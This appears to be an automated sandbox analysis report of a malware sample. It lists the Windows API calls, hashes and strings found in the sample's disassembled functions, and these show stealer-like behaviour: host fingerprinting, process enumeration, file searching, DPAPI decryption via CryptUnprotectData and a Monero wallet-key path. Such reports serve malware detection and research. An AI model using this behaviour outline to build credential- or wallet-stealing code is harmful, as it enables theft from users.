API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 15bf279b9b5cae1f31eb41f2ab72d2fbf6c30790602a4de4ba77431e986408d0
Instruction ID: b7ab7b281e91623abf64b36186bfeb142d182b00c8c1ceaad99388d5af7cb9ec
Opcode Fuzzy Hash: 15bf279b9b5cae1f31eb41f2ab72d2fbf6c30790602a4de4ba77431e986408d0
Instruction Fuzzy Hash: 159141729002049BDF18FBB4DC969EE737DFB95300F448568A85AD6941EF389B09CB93

Function 008A7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

GetKeyboardLayoutList.USER32(00000000,00000000,008B05AF), ref: 008A7BE1
LocalAlloc.KERNEL32(00000040,?), ref: 008A7BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 008A7C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 008A7C62
LocalFree.KERNEL32(00000000), ref: 008A7D22

Strings

/ , xrefs: 008A7C7F

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 068146ba96a47f077fd63a3e833b7820d9209f64a914d22c7671f7e50c7c01ea
Instruction ID: f460df48d2a437953b7ea12f30363d909df58f6b5f76217554238b960555df30
Opcode Fuzzy Hash: 068146ba96a47f077fd63a3e833b7820d9209f64a914d22c7671f7e50c7c01ea
Instruction Fuzzy Hash: DC41717190121CABEB24DB94DC99BEEB774FF55700F2041D9E40AA2680DB742F85CFA2

Function 0089E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,008B0D73), ref: 0089E4A2
StrCmpCA.SHLWAPI(?,008B14F8), ref: 0089E4F2
StrCmpCA.SHLWAPI(?,008B14FC), ref: 0089E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0089EBDF

Strings

\*.*, xrefs: 0089E44D

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: c3efb06fd316b62f6fae3ad6192164e569cd36c3c67994cb3d5183d54cc65c13
Instruction ID: 7fea29e59e3a005ec365390b7b947c24ef8d7f6dc7c49f15f6ec53af18e28adb
Opcode Fuzzy Hash: c3efb06fd316b62f6fae3ad6192164e569cd36c3c67994cb3d5183d54cc65c13
Instruction Fuzzy Hash: E9125E319001189AEB58FB68DC96AEE7338FF55300F4441A9B50BD6991EF386F49CB93

Function 008A9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008A961E
Process32First.KERNEL32(008B0ACA,00000128), ref: 008A9632
Process32Next.KERNEL32(008B0ACA,00000128), ref: 008A9647
StrCmpCA.SHLWAPI(?,00000000), ref: 008A965C
CloseHandle.KERNEL32(008B0ACA), ref: 008A967A

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 14c04f0f7c9568a7912ccd3a3a21cab37bd0f818667a992698ca4372f55b084c
Instruction ID: d5f185fd060749936633e224c65d24439c33a347008bce29880c6fabd2d2e297
Opcode Fuzzy Hash: 14c04f0f7c9568a7912ccd3a3a21cab37bd0f818667a992698ca4372f55b084c
Instruction Fuzzy Hash: 2B010CB5A05208ABDB14DFA5CD48BEDB7F8FF58300F104189E94AD6640DB749B41DF51

Function 008A8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008B05B7), ref: 008A86CA
Process32First.KERNEL32(?,00000128), ref: 008A86DE
Process32Next.KERNEL32(?,00000128), ref: 008A86F3

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

CloseHandle.KERNEL32(?), ref: 008A8761

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: b651c0857f3eaab4dd5f835d21e37653f284c0bdf59154b75be3542768deac5a
Instruction ID: 92d8e51c00c383f6c26a8440655842f70cc7917060d5a94f1f4f99ded6fd7c71
Opcode Fuzzy Hash: b651c0857f3eaab4dd5f835d21e37653f284c0bdf59154b75be3542768deac5a
Instruction Fuzzy Hash: 38316F71901218EBDB68DF94CC45FEEB778FB46700F1041A9E50AE2A90DB346A45CFA2

Function 008A7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0142DEA0,00000000,?,008B0E10,00000000,?,00000000,00000000), ref: 008A7A63
RtlAllocateHeap.NTDLL(00000000), ref: 008A7A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0142DEA0,00000000,?,008B0E10,00000000,?,00000000,00000000,?), ref: 008A7A7D
wsprintfA.USER32 ref: 008A7AB7

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: e597e259538e8b92c03b233847a0de90a8a26f61a1daaaeaac283241d6ac04f4
Instruction ID: 2c63d37154ad010ae08bbb493a1a017014bedea133ae6ce8dabc6084eab34808
Opcode Fuzzy Hash: e597e259538e8b92c03b233847a0de90a8a26f61a1daaaeaac283241d6ac04f4
Instruction Fuzzy Hash: DF11ACB1906228EBEB20CF54CC49FAAB778FB00721F00439AE91AD32C0D7381A40CF51

Function 00899B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00899B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00899BA3
LocalFree.KERNEL32(?), ref: 00899BD3

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 211a2def5117729763082826b1cce53cfe8f034b5a6ba60851160d50ba84cdf1
Instruction ID: a33aaf9d51519d827a039418a780ad8229788c15780240064023bfe51882d894
Opcode Fuzzy Hash: 211a2def5117729763082826b1cce53cfe8f034b5a6ba60851160d50ba84cdf1
Instruction Fuzzy Hash: 101109B8A00209EFDB04DF98D985AAEB7B5FF88300F104599ED15A7350D774AE11CFA1

Function 008A78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7910
RtlAllocateHeap.NTDLL(00000000), ref: 008A7917
GetComputerNameA.KERNEL32(?,00000104), ref: 008A792F

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 877d77be278ff269a01a313130191c676fde3aaa8db7e28b3dcb3bb1f293f511
Instruction ID: ca228e51b1177dbd834f9c728cad12d218d5126a00613b915bd6050e68bcd6ab
Opcode Fuzzy Hash: 877d77be278ff269a01a313130191c676fde3aaa8db7e28b3dcb3bb1f293f511
Instruction Fuzzy Hash: F00162B1904208EFD710DF94DD45BAFFBB8F705B21F10421AEA45E2680C37859059BA1

Function 008A7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008911B7), ref: 008A7880
RtlAllocateHeap.NTDLL(00000000), ref: 008A7887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 008A789F

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
